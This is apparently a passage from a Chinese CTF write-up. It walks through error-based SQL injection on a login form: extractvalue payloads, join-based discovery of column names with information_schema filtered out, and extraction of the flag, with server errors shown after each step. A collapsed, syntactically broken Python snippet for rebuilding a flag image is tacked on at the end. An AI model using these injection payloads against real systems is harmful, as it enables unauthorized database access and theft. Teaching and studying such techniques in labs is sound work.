#You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123456'') LIMIT 0,1' at line 1
uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select * from flag),0x7e))--+&Submit=%E7%99%BB%E5%BD%95
#Operand should contain 1 column(s)
3.爆列名
过滤了information_schema函数,可以使用join 无列名注入
得到id列
1 2 3
uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select * from (select * from flag a join flag )b),0x7e))--+&Submit=%E7%99%BB%E5%BD%95
#Duplicate column name 'id'
得到no列
1 2 3
uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select * from (select * from flag join flag as a using(id))b),0x7e))--+&Submit=%E7%99%BB%E5%BD%95
#Duplicate column name 'no'
得到ea1235fa-d397-474b-8188-dedbe352ffc7列
1 2 3
uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select * from (select * from flag join flag as a using(id,no))b),0x7e))--+&Submit=%E7%99%BB%E5%BD%95
#Duplicate column name 'ea1235fa-d397-474b-8188-dedbe352ffc7'
4.爆值
1 2 3
uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select `ea1235fa-d397-474b-8188-dedbe352ffc7` from flag),0x7e))--+&Submit=%E7%99%BB%E5%BD%95
uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,right((select `ea1235fa-d397-474b-8188-dedbe352ffc7` from flag),20),0x7e))--+&Submit=%E7%99%BB%E5%BD%95
flag_img = Image.new('1',(400,400)) #mode=1 1位黑白像素,每字节存储一个像素 for name inrange(0,381): framepic = Image.open(f"./running_pixel/{name}.png") framepic = framepic.convert("RGB") width,height = framepic.size for w inrange(width): for h inrange(height): if framepic.getpixel((w,h)) == (233,233,233): flag_img.putpixel((h,w),1)